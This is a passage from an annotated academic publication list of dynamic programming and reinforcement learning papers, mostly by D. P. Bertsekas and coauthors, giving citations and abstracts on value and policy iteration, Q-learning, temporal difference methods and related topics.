2015; SIAM J. on Optimization, Vol. 27, No. 3, pp. 1694-1727. (Related Lecture Slides); (Related Video Lectures). We consider an abstract dynamic programming model, and analysis based on regular policies that are well-behaved with respect to value iteration. We show that the optimal cost function over regular policies may have favorable fixed point and value iteration properties, which the optimal cost function over all policies need not have. We accordingly develop a methodology that can deal with long standing analytical and algorithmic issues in undiscounted dynamic programming models, such as stochastic shortest path, positive cost, negative cost, mixed positive-negative cost, risk-sensitive, and multiplicative cost problems. Among others, we use our approach to obtain new results for convergence of value and policy iteration in deterministic discrete-time optimal control with nonnegative cost per stage.\n\n• D. P. Bertsekas, \"Value and Policy Iteration in Deterministic Optimal Control and Adaptive Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-3174, MIT, May 2015 (revised Sept. 2015); arXiv preprint arXiv:1507.01026; IEEE Transactions on Neural Networks and Learning Systems, Vol. 28, 2017, pp. 500-509. In this paper, we consider discrete-time infinite horizon problems of optimal control to a terminal set of states. These are the problems that are often taken as the starting point for adaptive dynamic programming. Under very general assumptions, we establish the uniqueness of solution of Bellman's equation and we provide convergence results for value and policy iteration.\n\n• D. P. Bertsekas, \"Robust Shortest Path Planning and Semicontractive Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-2915, MIT, Feb. 2014 (revised Jan. 2015 and June 2016); Naval Research Logistics (NRL), 66(1), pp.15-37. In this paper we consider shortest path problems in a directed graph where the transitions between nodes are subject to uncertainty. We use a minimax formulation, where the objective is to guarantee that a special destination state is reached with a minimum cost path even under the worst possible instance of the uncertainty. Problems of this type arise, among others, in planning and pursuit-evasion contexts, and in model predictive control. Our analysis makes use of the recently developed theory of abstract semicontractive dynamic programming models. We investigate questions of existence and uniqueness of solution of the optimality equation, existence of optimal paths, and the validity of various algorithms patterned after the classical methods of value and policy iteration, as well as a new Dijkstra-like algorithm for problems with nonnegative arc lengths.\n\n• D. P. Bertsekas and H. Yu, \"Stochastic Shortest Path Problems Under Weak Conditions,\" Lab. for Information and Decision Systems Report LIDS-P-2909, MIT, Jan. 2016; to appear in Math. of OR. In this paper we weaken the conditions under which some of the basic analytical and algorithmic results for finite-state stochastic shortest path problems hold. We provide an analysis under three types of assumptions, under all of which the standard form of policy iteration may fail, and other anomalies may occur. In the first type of assumptions, we require a standard compactness and continuity condition, as well as the existence of an optimal proper policy, thereby allowing positive and negative costs per stage, and improper policies with finite cost at all states. The analysis is based on introducing an additive perturbation $\\d>0$ to the cost per stage, which drives the cost of improper policies to infinity. By considering the $\\d$-perturbed problem and taking the limit as $\\d\\downarrow0$, we show the validity of Bellman's equation and value iteration, and we construct a convergent policy iteration algorithm that uses a diminishing sequence of perturbations. In the second type of assumptions we require nonpositive one-stage costs and we give policy iteration algorithms that are optimistic and do not require the use of perturbations. In the third type of assumptions we require nonnegative one-stage costs, as well as the compactness and continuity condition, and we convert the problem to an equivalent stochastic shortest path problem for which the existing theory applies. Using this transformation, we address the uniqueness of solution of Bellman's equation, the convergence of value iteration, and the convergence of some variants of policy iteration. Our analysis and algorithms under the second and third type of assumptions fully apply to finite-state positive (reward) and negative (reward) dynamic programming models.\n\n• H. Yu and D. P. Bertsekas, \"A Mixed Value and Policy Iteration Method for Stochastic Control with Universally Measurable Policies,\" Lab. for Information and Decision Systems Report LIDS-P-2905, MIT, July 2013; Mathematics of Operations Research, Vol. 40, 2015, pp. 926-968. We consider the stochastic control model with Borel spaces and universally measurable policies. For this model the standard policy iteration is known to have difficult measurability issues and cannot be carried out in general. We present a mixed value and policy iteration method that circumvents this difficulty. The method allows the use of stationary policies in computing the optimal cost function, in a manner that resembles policy iteration. It can also be used to address similar difficulties of policy iteration in the context of upper and lower semicontinuous models. We analyze the convergence of the method in infinite horizon total cost problems, for the discounted case where the one-stage costs are bounded, and for the undiscounted case where the one-stage costs are nonpositive or nonnegative. For the undiscounted total cost problems with nonnegative one-stage costs, we also give a new convergence theorem for value iteration, which shows that value iteration converges whenever it is initialized with a function that is above the optimal cost function and yet bounded by a multiple of the optimal cost function. This condition resembles WhittleÕs bridging condition and is partly motivated by it. The theorem is also partly motivated by a result of Maitra and Sudderth, which showed that value iteration, when initialized with the constant function zero, could require a transfinite number of iterations to converge. We use the new convergence theorem for value iteration to establish the convergence of our mixed value and policy iteration method for the nonnegative cost models.\n\n• H. Yu and D. P. Bertsekas, \"Weighted Bellman Equations and their Applications in Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-2876, MIT, October 2012; related slide presentation (Related Lecture Slides from ADPRL 2014.) (Video of the lecture from ADPRL 2014.) We consider approximation methods for Markov decision processes in the learning and simulation context. For policy evaluation based on solving approximate versions of a Bellman equation, we propose the use of weighted Bellman mappings. Such mappings comprise weighted sums of one-step and multistep Bellman mappings, where the weights depend on both the step and the state. For projected versions of the associated Bellman equations, we show that their solutions have the same nature and essential approximation properties as the commonly used approximate solutions from TD($\\lambda$). The most important feature of our framework is that each state can be associated with a different type of mapping. Compared with the standard TD($\\lambda$) framework, this gives a more flexible way to combine multistage costs and state transition probabilities in approximate policy evaluation, and provides alternative means for bias-variance control. With weighted Bellman mappings, there is also greater flexibility to design learning and simulation-based algorithms. We demonstrate this with examples, including new TD-type algorithms with state-dependent $\\lambda$ parameters, as well as block versions of the algorithms. Weighted Bellman mappings can also be applied in approximate policy iteration: we provide several examples, including some new optimistic policy iteration schemes. Another major feature of our framework is that the projection need not be based on a norm, but rather can use a semi-norm. This allows us to establish a close connection between projected equation and aggregation methods, and to develop for the first time multistep aggregation methods, including some of the TD($\\lambda$)-type.\n\n• D. P. Bertsekas, \"Weighted Sup-Norm Contractions in Dynamic Programming: A Review and Some New Applications,\" Lab. for Information and Decision Systems Report LIDS-P-2884, MIT, May 2012. We consider a class of generalized dynamic programming models based on weighted sup-norm contractions. We provide an analysis that parallels the one available for discounted MDP and for generalized models based on unweighted sup-norm contractions. In particular, we discuss the main properties and associated algorithms of these models, including value iteration, policy iteration, and their optimistic and approximate variants. The analysis relies on several earlier works that use more specialized assumptions. In particular, we review and extend the classical results of Denardo [Den67] for unweighted sup-norm contraction models, as well as more recent results relating to approximation methods for discounted MDP. We also apply the analysis to stochastic shortest path problems where all policies are assumed proper. For these problems we extend three results that are known for discounted MDP. The first relates to the convergence of optimistic policy iteration and extends a result of Rothblum [Rot79], the second relates to error bounds for approximate policy iteration and extends a result of Bertsekas and Tsitsiklis [BeT96], and the third relates to error bounds for approximate optimistic policy iteration and extends a result of Thiery and Scherrer [ThS10b].\n\n• M. Wang and D. P. Bertsekas, \"Stabilization of Stochastic Iterative Methods for Singular and Nearly Singular Linear Systems,\" Lab. for Information and Decision Systems Report LIDS-P-2878, MIT, December 2011 (revised March 2012); Mathematics of Operations Research, Vol. 39, pp. 1-30, 2013; related slide presentation, related poster presentation.\n\nAbstract: We consider linear systems of equations, $Ax=b$, of various types frequently arising in large-scale applications, with an emphasis on the case where $A$ is singular. Under certain conditions, necessary as well as sufficient, linear deterministic iterative methods generate sequences $\\{x_k\\}$ that converge to a solution, as long as there exists at least one solution. We show that this convergence property is frequently lost when these methods are implemented with simulation, as is often done in important classes of large-scale problems. We introduce additional conditions and novel algorithmic stabilization schemes under which $\\{x_k\\}$ converges to a solution when $A$ is singular, and may also be used with substantial benefit when $A$ is nearly singular. Moreover, we establish the mathematical foundation for related work that deals with special cases of singular systems, including some arising in approximate dynamic programming, where convergence may be obtained without a stabilization mechanism.\n\n• M. Wang and D. P. Bertsekas, \"Convergence of Iterative Simulation-Based Methods for Singular Linear Systems,\" Lab. for Information and Decision Systems Report LIDS-P-2879, MIT, December 2011 (revised April 2012); Stochastic Systems, 2013; related slide presentation, related poster presentation.\n\nAbstract: We consider simulation-based algorithms for linear systems of equations, $Ax=b$, where $A$ is singular. The convergence properties of iterative solution methods can be impaired when the methods are implemented with simulation, as is often done in important classes of large-scale problems. We focus on special cases of singular systems, including some arising in approximate dynamic programming, where convergence of the residual sequence may be obtained without a stabilization mechanism, while the sequence of iterates may diverge. For some of these special cases, under additional assumptions, we show that the sequence is guaranteed to converge. For situations where the sequence of iterates diverges, we propose schemes for extracting from the divergent sequence another sequence that converges to a solution of $Ax=b$.\n\n• D. P. Bertsekas, \"Lambda-Policy Iteration: A Review and a New Implementation,\" Lab. for Information and Decision Systems Report LIDS-P-2874, MIT, October 2011. In \"Reinforcement Learning and Approximate Dynamic Programming for Feedback Control,\" by F. Lewis and D. Liu (eds.), IEEE Press Computational Intelligence Series, 2012.\n\nAbstract: In this paper we discuss lambda-policy iteration, a method for exact and approximate dynamic programming. It is intermediate between the classical value iteration (VI) and policy iteration (PI) methods, and it is closely related to optimistic (also known as modified) PI, whereby each policy evaluation is done approximately, using a finite number of VI. We review the theory of the method and associated questions of bias and exploration arising in simulation-based cost function approximation. We then discuss various implementations, which offer advantages over well-established PI methods that use LSPE(lambda), LSTD(lambda), or TD(lambda) for policy evaluation with cost function approximation. One of these implementations is based on a new simulation scheme, called geometric sampling, which uses multiple short trajectories rather than a single infinitely long trajectory.\n\n• H. Yu and D. P. Bertsekas, \"Q-Learning and Policy Iteration Algorithms for Stochastic Shortest Path Problems,\" Lab. for Information and Decision Systems Report LIDS-P-2871, MIT, September 2011; revised March 2012; Annals of Operations Research Vol. 208, 2013, pp. 95-132.\n\nAbstract: We consider the stochastic shortest path problem, a classical finite-state Markovian decision problem with a termination state, and we propose new convergent Q-learning algorithms that combine elements of policy iteration and classical Q-learning/value iteration. These algorithms are related to the ones introduced by the authors for discounted problems in [BeY10]. The main difference from the standard policy iteration approach is in the policy evaluation phase: instead of solving a linear system of equations, our algorithm solves an optimal stopping problem inexactly with a finite number of value iterations. The main advantage over the standard Q-learning approach is lower overhead: most iterations do not require a minimization over all controls, in the spirit of modified policy iteration. We prove the convergence of asynchronous stochastic lookup table implementations of our method for undiscounted, total cost stochastic shortest path problems, thereby overcoming some of the traditional convergence difficulties of asynchronous modified policy iteration, and providing policy iteration-like alternative Q-learning schemes with as reliable convergence as classical Q-learning. We also discuss methods that use basis function approximations of Q-factors and we give associated error bounds.\n\n• H. Yu and D. P. Bertsekas, \"On Boundedness of Q-Learning Iterates for Stochastic Shortest Path Problems,\" Lab. for Information and Decision Systems Report LIDS-P-2859, MIT, March 2011; revised Sept. 2011; Mathematics of Operations Research 38(2), pp. 209-227, 2013.\n\nAbstract: We consider a totally asynchronous stochastic approximation algorithm, Q-learning, for solving finite space stochastic shortest path (SSP) problems, which are total cost Markov decision processes with an absorbing and cost-free state. For the most commonly used SSP models, existing convergence proofs assume that the sequence of Q-learning iterates is bounded with probability one, or some other condition that guarantees boundedness. We prove that the sequence of iterates is naturally bounded with probability one, thus furnishing the boundedness condition in the convergence proof by Tsitsiklis [Tsi94] and establishing completely the convergence of Q-learning for these SSP models.\n\n• D. P. Bertsekas, \"Temporal Difference Methods for General Projected Equations,\" IEEE Trans. on Automatic Control, Vol. 56, pp. 2128 - 2139, 2011.\n\nAbstract: We consider projected equations for approximate solution of high-dimensional fixed point problems within low-dimensional subspaces. We introduce an analytical framework based on an equivalence with variational inequalities, and a class of iterative algorithms that may be implemented with low-dimensional simulation. These algorithms originated in approximate dynamic programming (DP), where they are collectively known as temporal difference (TD) methods. Even when specialized to DP, our methods include extensions/new versions of TD methods, which offer special implementation advantages and reduced overhead over the standard LSTD and LSPE methods, and can deal with rank deficiency in the associated matrix inversion. There is a sharp qualitative distinction between the deterministic and the simulation-based versions: the performance of the former is greatly affected by direction and feature scaling, yet the latter have the same asymptotic convergence rate regardless of scaling, because of their common simulation-induced performance bottleneck. (Related Lecture Slides)\n\n• N. Polydorides, M. Wang, and D. P. Bertsekas, \"A Quasi Monte Carlo Method for Large Scale Inverse Problems,\" Proc. of The 9th International Conference on Monte Carlo and Quasi-Monte Carlo Methods in Scientific Computing (MCQMC 2010); in \"Monte Carlo and Quasi-Monte Carlo Methods 2010,\" by H. Wozniakowski and L. Plaskota (eds), Springer-Verlag.\n\nAbstract: We consider large-scale linear inverse problems with a simulation-based algorithm that approximates the solution within a low-dimensional subspace. The algorithm uses Tikhonov regularization, regression, and low-dimensional linear algebra calculations and storage. For sampling efficiency, we implement importance sampling schemes, specially tailored to the structure of inverse problems. We emphasize various alternative methods for approximating the optimal sampling distribution and we demonstrate their impact on the reduction of simulation noise. The performance of our algorithm is tested on a practical inverse problem arising from Fredholm integral equations of the first kind.\n\n• D. P. Bertsekas and H. Yu, \"Distributed Asynchronous Policy Iteration in Dynamic Programming,\" Proc. of 2010 Allerton Conference on Communication, Control, and Computing, Allerton Park, ILL, Sept. 2010. (Related Lecture Slides) (An extended version with additional algorithmic analysis) (A counterexample by Williams and Baird that motivates in part this paper)\n\nAbstract: We consider the distributed solution of dynamic programming (DP) problems by policy iteration. We envision a network of processors, each updating asynchronously a local policy and a local cost function, defined on a portion of the state space. The computed values are communicated asynchronously between processors and are used to perform the local policy and cost updates. The natural algorithm of this type can fail even under favorable circumstances, as shown by Williams and Baird [WiB93]. We propose an alternative and almost as simple algorithm, which converges to the optimum under the most general conditions, including asynchronous updating by multiple processors using outdated local cost functions of other processors.\n\n• D. P. Bertsekas, \"Pathologies of Temporal Difference Methods in Approximate Dynamic Programming,\" Proc. 2010 IEEE Conference on Decision and Control, Atlanta, GA, Dec. 2010. (Related Lecture Slides)\n\nAbstract: Approximate policy iteration methods based on temporal differences are popular in practice, and have been tested extensively, dating to the early nineties, but the associated convergence behavior is complex, and not well understood at present. An important question is whether the policy iteration process is seriously hampered by oscillations between poor policies, roughly similar to the attraction of gradient methods to poor local minima. There has been little apparent concern in the approximate DP/reinforcement learning literature about this possibility, even though it has been documented with several simple examples. Recent computational experimentation with the game of tetris, a popular testbed for approximate DP algorithms over a 15-year period, has brought the issue to sharp focus. In particular, using a standard set of 22 features and temporal difference methods, an average score of a few thousands was achieved. Using the same features and a random search method, an overwhelmingly better average score was achieved (600,000-900,000). The paper explains the likely mechanism of this phenomenon, and derives conditions under which it will not occur.\n\n• D. P. Bertsekas and H. Yu, \"Q-Learning and Enhanced Policy Iteration in Discounted Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-2831, MIT, April, 2010 (revised November 2011); Math. of Operations Research, Vol. 37, 2012, pp. 66-94; a shorter version appears in Proc. of 2010 IEEE Conf. on Decision and Control, Atlanta, GA, Dec. 2010.(Related Lecture Slides) (A counterexample by Williams and Baird that motivates in part this paper)\n\nAbstract: We consider the classical finite-state discounted Markovian decision problem, and we introduce a new policy iteration-like algorithm for finding the optimal Q-factors. Instead of policy evaluation by solving a linear system of equations, our algorithm requires (possibly inexact) solution of a nonlinear system of equations, involving estimates of state costs as well as Q-factors. This is Bellman's equation for an optimal stopping problem that can be solved with simple Q-learning iterations, in the case where a lookup table representation is used; it can also be solved with the Q-learning algorithm of Tsitsiklis and Van Roy [TsV99], in the case where feature-based Q-factor approximations are used. In exact/lookup table representation form, our algorithm admits asynchronous and stochastic iterative implementations, in the spirit of asynchronous/modified policy iteration, with lower overhead and more reliable convergence advantages over existing Q-learning schemes. Furthermore, for large-scale problems, where linear basis function approximations and simulation-based temporal difference implementations are used, our algorithm resolves effectively the inherent difficulties of existing schemes due to inadequate exploration.\n\n• D. P. Bertsekas, \"Approximate Policy Iteration: A Survey and Some New Methods,\" Journal of Control Theory and Applications, Vol. 9, 2011, pp. 310-335.\n\nAbstract: We consider the classical policy iteration method of dynamic programming (DP), where approximations and simulation are used to deal with the curse of dimensionality. We survey a number of issues: convergence and rate of convergence of approximate policy evaluation methods, singularity and susceptibility to simulation noise of policy evaluation, exploration issues, constrained and enhanced policy iteration, policy oscillation and chattering, and optimistic policy iteration.\n\nOur discussion of policy evaluation is couched in general terms, and aims to unify the many approaches in the field in the light of recent research developments, and to compare the two main policy evaluation approaches: projected equations and temporal differences (TD), and aggregation. In the context of these approaches, we survey two different types of simulation-based algorithms: matrix inversion methods such as LSTD, and iterative methods such as LSPE and TD(lambda), and their scaled variants. We discuss a recent method, based on regression and regularization, which rectifies the unreliability of LSTD for nearly singular projected Bellman equations. An iterative version of this method belongs to the LSPE class of methods, and provides the connecting link between LSTD and LSPE.\n\nOur discussion of policy improvement focuses on the role of policy oscillation and its effect on performance guarantees. We illustrate that policy evaluation when done by the projected equation/TD approach may lead to policy oscillation, but when done by aggregation it does not. This implies better error bounds and more regular performance for aggregation, at the expense of some loss of generality in cost function representation capability. Hard aggregation provides the connecting link between projected equation/TD-based and aggregation-based policy evaluation, and is characterized by favorable error bounds.\n\n• N. Polydorides, M. Wang, and D. P. Bertsekas, \"Approximate Solution of Large-Scale Linear Inverse Problems with Monte Carlo Simulation,\" Lab. for Information and Decision Systems Report LIDS-P-2822, MIT, November 2009.\n\nAbstract: We consider the approximate solution of linear ill-posed inverse problems of high dimension with a simulation-based algorithm that approximates the solution within a low-dimensional subspace. The algorithm uses Tikhonov regularization, regression, and low-dimensional linear algebra calculations and storage. For sampling efficiency, we use variance reduction/importance sampling schemes, specially tailored to the structure of inverse problems. We demonstrate the implementation of our algorithm in a series of practical large-scale examples arising from Fredholm integral equations of the first kind.\n\n• M. Wang, N. Polydorides, and D. P. Bertsekas, \"Approximate Simulation-Based Solution of Large-Scale Least Squares Problems,\" Lab. for Information and Decision Systems Report LIDS-P-2819, MIT, September 2009.\n\nAbstract: We consider linear least squares problems of very large dimension, such as those arising for example in inverse problems. We introduce an associated approximate problem, within a subspace spanned by a relatively small number of basis functions, and solution methods that use simulation, importance sampling, and low-dimensional calculations. The main components of this methodology are a regression/regularization approach that can deal with nearly singular problems, and an importance sampling design approach that exploits existing continuity structures in the underlying models, and allows the solution of very large problems.\n\n• D. P. Bertsekas, \"Projected Equations, Variational Inequalities, and Temporal Difference Methods,\" Lab. for Information and Decision Systems Report LIDS-P-2808, MIT, March 2009 -- A shorter/abridged version appeared in Proc. of IEEE International Symposium on Adaptive Dynamic Programming and Reinforcement Learning 2009, Nashville, TN.\n\nAbstract: We consider projected equations for approximate solution of high-dimensional fixed point problems within low-dimensional subspaces. We introduce a unified framework based on an equivalence with variational inequalities (VIs), and a class of iterative feasible direction methods that may be implemented with low-dimensional simulation. These methods originated in approximate dynamic programming (DP), where they are collectively known as temporal difference (TD) methods. Even when specialized to DP, our methods include extensions/new versions of TD algorithms, which offer special implementation advantages, reduced overhead, and improved computational complexity over the standard LSTD and LSPE methods. We demonstrate a sharp qualitative distinction between the deterministic and the simulation-based versions: the performance of the former is greatly affected by direction and feature scaling, yet the latter asymptotically perform identically, regardless of scaling. (Related Lecture Slides)\n\n• H. Yu and D. P. Bertsekas, \"Basis Function Adaptation Methods for Cost Approximation in MDP,\" Proc. of IEEE International Symposium on Adaptive Dynamic Programming and Reinforcement Learning 2009, Nashville, TN. Click here for an extended version.\n\nAbstract: We generalize a basis adaptation method for cost approximation in Markov decision processes (MDP), extending earlier work of Menache, Mannor, and Shimkin. In our context, basis functions are parametrized and their parameters are tuned by minimizing an objective function involving the cost function approximation obtained when a temporal differences (TD) or other method is used. The adaptation scheme involves only low order calculations and can be implemented in a way analogous to policy gradient methods. In the generalized basis adaptation framework we provide extensions to TD methods for nonlinear optimal stopping problems and to alternative cost approximations beyond those based on TD. (Related Lecture Slides)\n\n• H. Yu and D. P. Bertsekas, \"Error Bounds for Approximations from Projected Linear Equations,\" Mathematics of Operations Research, Vol. 35, 2010, pp. 306-329. -- A shorter/abridged version appeared at European Workshop on Reinforcement Learning (EWRL'08), 2008, Lille, France.\n\nAbstract: We consider linear fixed point equations and their approximations by projection on a low dimensional subspace. We derive new bounds on the approximation error of the solution, which are expressed in terms of low dimensional matrices and can be computed by simulation. When the fixed point mapping is a contraction, as is typically the case in Markov decision processes (MDP), one of our bounds is always sharper than the standard contraction-based bounds, and another one is often sharper. The former bound is also tight in a worst-case sense. Our bounds also apply to the non-contraction case, including policy evaluation in MDP with nonstandard projections that enhance exploration. There are no error bounds currently available for this case to our knowledge.(Related Lecture Slides)\n\n• D. P. Bertsekas and H. Yu, \"Projected Equation Methods for Approximate Solution of Large Linear Systems,\" Journal of Computational and Applied Mathematics, Vol. 227, 2009, pp. 27-50.\n\nAbstract: We consider linear systems of equations and solution approximations derived by projection on a low-dimensional subspace. We propose stochastic iterative algorithms, based on simulation, which converge to the approximate solution and are suitable for very large-dimensional problems. The algorithms are extensions of recent approximate dynamic programming methods, known as temporal difference methods, which solve a projected form of Bellman's equation by using simulation-based approximations to this equation, or by using a projected value iteration method. (Related Lecture Slides) An extended report: \"Solution of Large Systems of Equations Using Approximate Dynamic Programming Methods,\" Lab. for Information and Decision Systems Report 2754, MIT, June 2007.\n\n• H. Yu and D. P. Bertsekas, \"Q-Learning Algorithms for Optimal Stopping Based on Least Squares,\" Proc. European Control Conference 2007, Kos, Greece, July 2007. (Related Lecture Slides) An extended report: \"A Least Squares Q-Learning Algorithm for Optimal Stopping Problems,\" Lab. for Information and Decision Systems Report 2731, MIT, February 2007 (revised June 2007).\n\nAbstract: We consider the solution of discounted optimal stopping problems using linear function approximation methods. A $Q$-learning algorithm for such problems, proposed by Tsitsiklis and Van Roy, is based on the method of temporal differences and stochastic approximation. We propose alternative algorithms, which are based on projected value iteration ideas and least squares. We prove the convergence of some of these algorithms and discuss their properties. (Lecture Slides)\n\n• H. Yu and D. P. Bertsekas, \"On Near-Optimality of the Set of Finite-State Controllers for Average Cost POMDP,\" Lab. for Information and Decision Systems Report 2689, MIT, April 2006; Mathematics of Operations Research, 33(1), pp. 1-11, February 2008.\n\nAbstract: We consider the average cost problem for partially observable Markov decision processes (POMDP) with finite state, observation, and control spaces. We prove that there exists an $\\epsilon$-optimal finite-state controller functionally independent of initial distributions for any $\\epsilon > 0$, under the assumption that the optimal liminf average cost function of the POMDP is constant. As part of our proof, we establish that if the optimal liminf average cost function is constant, then the optimal limsup average cost function is also constant, and the two are equal. We also discuss the connection between the existence of nearly optimal finite-history controllers and two other important issues for average cost POMDP: the existence of an average cost that is independent of the initial state distribution, and the existence of a bounded solution to the constant average cost optimality equation. (Related slide presentation)\n\n• H. Yu and D. P. Bertsekas, \"Convergence Results for Some Temporal Difference Methods Based on Least Squares,\" Lab. for Information and Decision Systems Report 2697, MIT, June 2006; revised August, 2008; IEEE Trans. on Aut. Control, Vol. 54, 2009, pp. 1515-1531.\n\nAbstract: We consider finite-state Markovian Decision Problems and prove convergence and rate of convergence results for certain least squares policy evaluation algorithms. These are temporal difference methods for constructing a linear function approximation of the cost function of a stationary policy, within the context of infinite-horizon discounted and average cost dynamic programming. We introduce an average cost method, patterned after the discounted cost method, which uses a constant stepsize, and we prove its convergence. We also show that the convergence rate of both the discounted and the average cost methods is optimal within the class of temporal difference methods. Analysis and experiment indicate that our methods are substantially and often dramatically faster than TD(Lambda), as well as more reliable. (Related slide presentation)\n\n• D. P. Bertsekas, \"Separable Dynamic Programming and Approximate Decomposition Methods,\" Lab. for Information and Decision Systems Report 2684, MIT, Feb. 2006; IEEE Trans. on Aut. Control, Vol. 52, 2007, pp. 911-916.\n\nAbstract: We consider control, planning, and resource allocation problems involving several independent subsystems that are coupled through a control/decision constraint. We discuss one-step lookahead methods that use an approximate cost-to-go function derived from the solution of single subsystem problems. We propose a new method for constructing such approximations, and derive bounds on the performance of the associated suboptimal policies. We then specialize this method to problems of reachability of target tubes that have the form of a box (a Cartesian product of subsystem tubes). This yields inner approximating tubes, which have the form of a union of a finite number of boxes, each involving single subsystem calculations.\n\n• D. P. Bertsekas, \"Dynamic Programming and Suboptimal Control: A Survey from ADP to MPC,\" in Fundamental Issues in Control, European J. of Control, Vol. 11, Nos. 4-5, 2005; From 2005 CDC, Seville, Spain.\n\nAbstract: We survey selectively the field of approximate dynamic programming (ADP), with a particular emphasis on two recent directions of research: rollout algorithms and model predictive control (MPC). We argue that while motivated by different concerns, these two methodologies are closely connected, and the mathematical essence of their desirable properties (cost improvement and stability, respectively) is couched on the central dynamic programming idea of policy iteration. In particular, among other things, we show that the most common MPC schemes can be viewed as rollout algorithms or one-step policy iteration methods. Furthermore, we embed rollout and MPC within a new unifying suboptimal control framework, based on a concept of restricted or constrained structure policies, which contains these schemes as special cases.\n\n• D. P. Bertsekas, \"Rollout Algorithms for Constrained Dynamic Programming,\" Lab. for Information and Decision Systems Report 2646, MIT, April 2005.\n\nAbstract: The rollout algorithm is a suboptimal control method for deterministic and stochastic problems that can be solved by dynamic programming. In this short note, we derive an extension of the rollout algorithm that applies to constrained deterministic dynamic programming problems, and relies on a suboptimal policy, called base heuristic. Under suitable assumptions, we show that if the base heuristic produces a feasible solution, the rollout algorithm also produces a feasible solution, whose cost is no worse than the cost corresponding to the base heuristic.\n\n• H. Yu, and D. P. Bertsekas, \"Discretized Approximations for POMDP with Average Cost,\" The 20th Conference on Uncertainty in Artificial Intelligence, 2004, Banff, Canada.\n\nAbstract: In this paper, we propose a new lower approximation scheme for POMDP with discounted and average cost criterion. The approximating functions are determined by their values at a finite number of belief points, and can be computed efficiently using value iteration algorithms for finite-state MDP. While for discounted problems several lower approximation schemes have been proposed earlier, ours seems the first of its kind for average cost problems. We focus primarily on the average cost case, and we show that the corresponding approximation can be computed efficiently using multi-chain algorithms for finite-state MDP. We give a preliminary analysis showing that regardless of the existence of the optimal average cost in the POMDP, the approximation obtained is a lower bound of the liminf optimal average cost function, and can also be used to calculate an upper bound on the limsup optimal average cost function, as well as bounds on the cost of executing the stationary policy associated with the approximation. We show the convergence of the cost approximation, when the optimal average cost is constant and the optimal differential cost is continuous.\n\n• D. P. Bertsekas, V. Borkar, and A. Nedic, \"Improved Temporal Difference Methods with Linear Function Approximation,\" in \"Learning and Approximate Dynamic Programming\", by A. Barto, W. Powell, J. Si, (Eds.), IEEE Press, 2004, pp. 231-255.\n\nAbstract: We consider temporal difference algorithms within the context of infinite-horizon finite-state dynamic programming problems with discounted cost, and linear cost function approximation. We show, under standard assumptions, that a least squares-based temporal difference method, proposed by Nedic and Bertsekas [NeB03], converges with a stepsize equal to 1. To our knowledge, this is the first iterative temporal difference method that converges without requiring a diminishing stepsize. We discuss the connections of the method with Sutton's TD(Lambda) and with various versions of least-squares based value iteration, and we show via analysis and experiment that the method is substantially and often dramatically faster than TD(Lambda), as well as simpler and more reliable. We also discuss the relation of our method with the LSTD method of Boyan [Boy02], and Bradtke and Barto [BrB96].\n\n• A. Nedic and D. P. Bertsekas, \"Least-Squares Policy Evaluation Algorithms with Linear Function Approximation,\" LIDS Report LIDS-P-2537, Dec. 2001; J. of Discrete Event Systems, Vol. 13, 2003, pp. 79-110.\n\nAbstract: We consider two policy evaluation methods for discounted dynamic programming, which use simulation, temporal differences, and linear cost function approximation. The first method is a new gradient-like algorithm involving least-squares subproblems and a diminishing stepsize, which is based on the lambda-policy iteration method of Bertsekas and Ioffe. The second method is the LSTD(lambda) algorithm recently proposed by Boyan, which for lambda=0 coincides with the linear least-squares temporal-difference algorithm of Bradtke and Barto. At present, there is only a convergence result by Bradtke and Barto for the LSTD(0) algorithm. Here, we strengthen this result by showing the convergence of LSTD(lambda), with probability 1, for every lambda in [0,1].\n\n• C. C. Wu and D. P. Bertsekas, \"Admission Control for Wireless Networks,\"accepted inIEEE Trans. on Vehicular Technology.\n\nAbstract: With the population of wireless subscribers increasing at a rapid rate, overloaded situations are likely to become an increasing problem. Admission control can be used to balance the goals of maximizing bandwidth utilization and ensuring sufficient resources for high priority events. In this paper, we formulate the admission control problem as a Markov decision problem. While dynamic programming can be used to solve such problems, the large size of the state space makes this impractical. We propose an approximate dynamic programming technique, which involves creating an approximation of the original model with a state space sufficiently small so that dynamic programming can be applied. Our results show that the method improves significantly on policies that are generally in use, in particular, the greedy policy and the reservation policy. Much of the computation required for our method can be done off-line, and the real-time computation required is easily distributed between the cells.\n\n• D. P. Bertsekas and D. A. Castanon, \"Rollout Algorithms for Stochastic Scheduling Problems,\" J. of Heuristics, Vol. 5, 1999, pp. 89-108.\n\nAbstract: Stochastic scheduling problems are difficult stochastic control problems with combinatorial decision spaces. In this paper we focus on a class of stochastic scheduling problems, the quiz problem and its variations. We discuss the use of heuristics for their solution, and we propose rollout algorithms based on these heuristics which approximate the stochastic dynamic programming algorithm. We show how the rollout algorithms can be implemented efficiently, and we delineate circumstances under which they are guaranteed to perform better than the heuristics on which they are based. We also show computational results which suggest that the performance of the rollout policies is near-optimal, and is substantially better than the performance of their underlying heuristics.\n\n• D. P. Bertsekas, M. L. Homer, D. A. Logan, S. D. Patek, and N. R. Sandell, \"Missile Defense and Interceptor Allocation by Neuro-Dynamic Programming,\" IEEE Trans. on Systems, Man, and Cybernetics, 1999.\n\nAbstract: The purpose of this paper is to propose a solution methodology for a missile defense problem involving the sequential allocation of defensive resources over a series of engagements. The problem is cast as a dynamic programming/Markovian decision problem, which is computationally intractable by exact methods because of its large number of states and its complex modeling issues. We have employed a Neuro-Dynamic Programming (NDP) framework, whereby the cost-to-go function is approximated using neural network architectures that are trained on simulated data. We report on the performance obtained using several different training methods, and we compare this performance with the optimal.\n\n• J. Abounadi, D. Bertsekas, and V. Borkar, \"Learning Algorithms for Markov Decision Processes,\" Report LIDS-P-2434, Lab. for Info. and Decision Systems, 1998; SIAM J. on Control and Optimization, Vol. 40, 2001, pp. 681-698.\n\nAbstract: This paper gives the first rigorous convergence analysis of analogs of Watkins' Q-learning algorithm, applied to average cost control of finite-state Markov chains. We discuss two algorithms which may be viewed as stochastic approximation counterparts of two existing algorithms for recursively computing the value function of average cost problem - the traditional relative value iteration algorithm and a recent algorithm of Bertsekas based on the stochastic shortest path (SSP) formulation of the problem. Both synchronous and asynchronous implementations are considered and are analyzed using the ODE\" method. This involves establishing asymptotic stability of associated ODE limits. The SSP algorithm also uses ideas from two time scale stochastic approximation.\n\n• J. Abounadi, D. Bertsekas, and V. Borkar, \"Stochastic Approximation for Non-Expansive Maps: 